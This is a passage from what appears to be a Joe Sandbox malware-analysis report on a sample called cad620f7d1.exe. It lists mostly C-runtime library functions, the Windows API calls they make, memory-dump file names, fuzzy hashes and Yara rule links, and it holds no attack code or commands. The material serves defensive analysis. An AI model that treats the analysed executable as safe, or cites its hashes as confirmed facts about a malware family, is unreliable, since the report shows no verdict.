                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                • API String ID: 667068680-1047828073
                                                                                                                                                                                                • Opcode ID: 59ea8c3543fcc6d9686efb2c837500c3ba81bcb85fbdacdf3be605eb159e4633
                                                                                                                                                                                                • Instruction ID: 5e72dc0ea0f561c7dff63dfba97ace8e8d138fa8f03dd674fe28d3c2ed87e728
                                                                                                                                                                                                • Opcode Fuzzy Hash: 59ea8c3543fcc6d9686efb2c837500c3ba81bcb85fbdacdf3be605eb159e4633
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DD0C77D5D27906F9340AF75BC4D8863FA4EB077113065122F405D2360FB7045058FB5
                                                                                                                                                                                                Function 00D38639 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00D38630,00D3443B,00D33B4A), ref: 00D38647
                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D38655
                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D3866E
                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00D38630,00D3443B,00D33B4A), ref: 00D386C0
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                • Opcode ID: a49e4c2417e7398e49fda71aa10fd79538cb6ef7255e01269f56c317f464122a
                                                                                                                                                                                                • Instruction ID: a8de2cef220c67c50bb37691880684029f4f543447eb0ab3af8068804d1ccca6
                                                                                                                                                                                                • Opcode Fuzzy Hash: a49e4c2417e7398e49fda71aa10fd79538cb6ef7255e01269f56c317f464122a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8101A7366093126FAA662FB5BCC652B2788EB42778F240239F514D66F1EF914C0272B4
                                                                                                                                                                                                Function 00D38EC9 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 00D38FE8
                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 00D39261
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                • API String ID: 2673424686-393685449
                                                                                                                                                                                                • Opcode ID: ddd56316add68666fdff7286adee272747610d29133dc540f97c565b0372061c
                                                                                                                                                                                                • Instruction ID: f6fcecd8bd0e7dbbe03f7874542b8f08a0ea6b5beff9cddea8dc51dcc7377cb8
                                                                                                                                                                                                • Opcode Fuzzy Hash: ddd56316add68666fdff7286adee272747610d29133dc540f97c565b0372061c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 94B15671800309EFCF18EFA4C9959AEBBB5EF08310F18415AF8156B206D7B1EA51DBB1
                                                                                                                                                                                                Function 00D3DC9B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe, xrefs: 00D3DCB7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe
                                                                                                                                                                                                • API String ID: 0-752647818
                                                                                                                                                                                                • Opcode ID: 0157fec22653bd06002ee1f8bad1602b7035231dfc9da093ea83634dd4e6d749
                                                                                                                                                                                                • Instruction ID: 426df2d511a43663b27d0a7e82b2bf9248d6c89b65e06310f62c0d8bb782f19e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0157fec22653bd06002ee1f8bad1602b7035231dfc9da093ea83634dd4e6d749
                                                                                                                                                                                                • Instruction Fuzzy Hash: 50216F71600309AF9B20AF65FC8196A77ABFF44364F144519F95997251DB70EC10CFB0
                                                                                                                                                                                                Function 00D3720B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6C1E7673,?,?,00000000,00D45CA3,000000FF,?,00D372CC,00000002,?,00D37368,00D384AD), ref: 00D37240
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D37252
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D45CA3,000000FF,?,00D372CC,00000002,?,00D37368,00D384AD), ref: 00D37274
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                • Opcode ID: c7b7bd46e41339429133b1220a528348efa10fb7c131c69998a9ab10762f6314
                                                                                                                                                                                                • Instruction ID: e89bd14049941b1d7238af0d9e0284745d0dcd34bd2b5fdcbc08d14e886271fe
                                                                                                                                                                                                • Opcode Fuzzy Hash: c7b7bd46e41339429133b1220a528348efa10fb7c131c69998a9ab10762f6314
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1301A275954B59AFCB118F54DC49BAEBBB8FB05B15F044526F811E2390EBB49800CBA0
                                                                                                                                                                                                Function 00D3F1A5 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00D3F22A
                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00D3F2F3
                                                                                                                                                                                                • __freea.LIBCMT ref: 00D3F35A
                                                                                                                                                                                                  • Part of subcall function 00D3B8D6: RtlAllocateHeap.NTDLL(00000000,00D3AB77,?,?,00D3AB77,00000220,?,00000000,?), ref: 00D3B908
                                                                                                                                                                                                • __freea.LIBCMT ref: 00D3F36D
                                                                                                                                                                                                • __freea.LIBCMT ref: 00D3F37A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1423051803-0
                                                                                                                                                                                                • Opcode ID: 489120c2eb7e94b9b6717e9380b61e1af2679a4ef6c707ad517921c1fad06e0c
                                                                                                                                                                                                • Instruction ID: 8945f705aae610eae3edc798e581cfdc5598a38f952bc25dd5dcc15012fc3015
                                                                                                                                                                                                • Opcode Fuzzy Hash: 489120c2eb7e94b9b6717e9380b61e1af2679a4ef6c707ad517921c1fad06e0c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D518C72A0024AABEB219FA4CC81EBB7AA9EF84754F190139FD04E7251EB74DC10D670
                                                                                                                                                                                                Function 00D330C1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00D330D5
                                                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00D45C4C,000000FF,?,00D3211F), ref: 00D330F4
                                                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00D45C4C,000000FF,?,00D3211F), ref: 00D33122
                                                                                                                                                                                                • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00D45C4C,000000FF,?,00D3211F), ref: 00D3317D
                                                                                                                                                                                                • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00D45C4C,000000FF,?,00D3211F), ref: 00D33194
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 66001078-0
                                                                                                                                                                                                • Opcode ID: 8104896f69cdd8fc550b2e8b2bd8dac29a544604e87a5209a600d56d8d7092ec
                                                                                                                                                                                                • Instruction ID: b3c4cebe9fb430abda7f5ed4c4d52d738cce539d25d3372ab901aaa29320b7f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8104896f69cdd8fc550b2e8b2bd8dac29a544604e87a5209a600d56d8d7092ec
                                                                                                                                                                                                • Instruction Fuzzy Hash: A4415B35A00706DFCB24CF65CA8496AB3F5FF05351F54492AD446D7A50D730EA85CBB0
                                                                                                                                                                                                Function 00D31C40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registrywindowCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00D31C9D
                                                                                                                                                                                                • RegisterClassW.USER32(?), ref: 00D31CB2
                                                                                                                                                                                                • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D31CDB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClassHandleMessageModuleRegister
                                                                                                                                                                                                • String ID: Christmas Balls
                                                                                                                                                                                                • API String ID: 1585107554-3481381322
                                                                                                                                                                                                • Opcode ID: 71cc2063d9166f3edb41b4d92bfda18e22eb227eae233fcb3520731a36118563
                                                                                                                                                                                                • Instruction ID: 9fec19d77553bb999ec89a916e44b9977046a9572a24bce5b44588de0994b647
                                                                                                                                                                                                • Opcode Fuzzy Hash: 71cc2063d9166f3edb41b4d92bfda18e22eb227eae233fcb3520731a36118563
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A217CB5C503899BDB10CFA0DD45BEEBBB4FF5A714F242229E508B6250E7742680CBA5
                                                                                                                                                                                                Function 00D3EEE6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D3EF82,00000000,?,00D4F760,?,?,?,00D3EEB9,00000004,InitializeCriticalSectionEx,00D478B0,00D478B8), ref: 00D3EEF3
                                                                                                                                                                                                • GetLastError.KERNEL32(?,00D3EF82,00000000,?,00D4F760,?,?,?,00D3EEB9,00000004,InitializeCriticalSectionEx,00D478B0,00D478B8,00000000,?,00D3951C), ref: 00D3EEFD
                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D3EF25
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                                                • Opcode ID: 7c3e19f9aaf2d1a85042cc4a66a6f87b1432d21ddf92c31364c937ea2c8f9099
                                                                                                                                                                                                • Instruction ID: 8169574423de47d439532b5c8d4176cd247847acc1268ca5e005b9ef105207ab
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c3e19f9aaf2d1a85042cc4a66a6f87b1432d21ddf92c31364c937ea2c8f9099
                                                                                                                                                                                                • Instruction Fuzzy Hash: F0E01A35A95308BBEB501F60EC06F283F56EF05B90F149030F90CE81E0EBA2A8109A74
                                                                                                                                                                                                Function 00D3F86C Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(6C1E7673,00000000,00000000,?), ref: 00D3F8CF
                                                                                                                                                                                                  • Part of subcall function 00D3E356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D3F350,?,00000000,-00000008), ref: 00D3E3B7
                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D3FB21
                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D3FB67
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00D3FC0A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                                                • Opcode ID: 2c93e473a9da343df6554c51486b830dde7f069c01e6d262f5df69fd9933ce9d
                                                                                                                                                                                                • Instruction ID: 3a04ff62c16e9f661e0ecbc60a8a10dfc080c131669776c4f5766a319fc40884
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c93e473a9da343df6554c51486b830dde7f069c01e6d262f5df69fd9933ce9d
                                                                                                                                                                                                • Instruction Fuzzy Hash: C5D158B5D0024CAFCF15CFA8D880AADBBB5FF49314F28456AE856EB351D630A941CF60
                                                                                                                                                                                                Function 00D38BF0 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                                • Opcode ID: b32ce2923cd513fe7b370805923258861f3c02817a25fff4aeb31fa39bf3a3be
                                                                                                                                                                                                • Instruction ID: 4f778eef05df7d547119080b1916364caa68b48671c5dd021ca099fe7f94aac7
                                                                                                                                                                                                • Opcode Fuzzy Hash: b32ce2923cd513fe7b370805923258861f3c02817a25fff4aeb31fa39bf3a3be
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3251C076601706AFDB299F14E841BAAB7A4EF24311F28452DF841972D1EF35EC41E7B0
                                                                                                                                                                                                Function 00D3D6FF Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00D3E356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D3F350,?,00000000,-00000008), ref: 00D3E3B7
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00D3D763
                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00D3D76A
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 00D3D7A4
                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00D3D7AB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                                                                                • Opcode ID: f5992a69f776f2a8733eaf1e8466d4268e44d01baabae3b2714dafe3e2df5480
                                                                                                                                                                                                • Instruction ID: 27faf6cf88d620de8a216545fdf9a423a59dd0141cb697967549a0c6b59a7942
                                                                                                                                                                                                • Opcode Fuzzy Hash: f5992a69f776f2a8733eaf1e8466d4268e44d01baabae3b2714dafe3e2df5480
                                                                                                                                                                                                • Instruction Fuzzy Hash: 962184B1600219AFDB20AF65EC8196BB7AAFF44364F148529F95AD7251DB30EC508FB0
                                                                                                                                                                                                Function 00D3E452 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00D3E45A
                                                                                                                                                                                                  • Part of subcall function 00D3E356: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D3F350,?,00000000,-00000008), ref: 00D3E3B7
                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D3E492
                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D3E4B2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
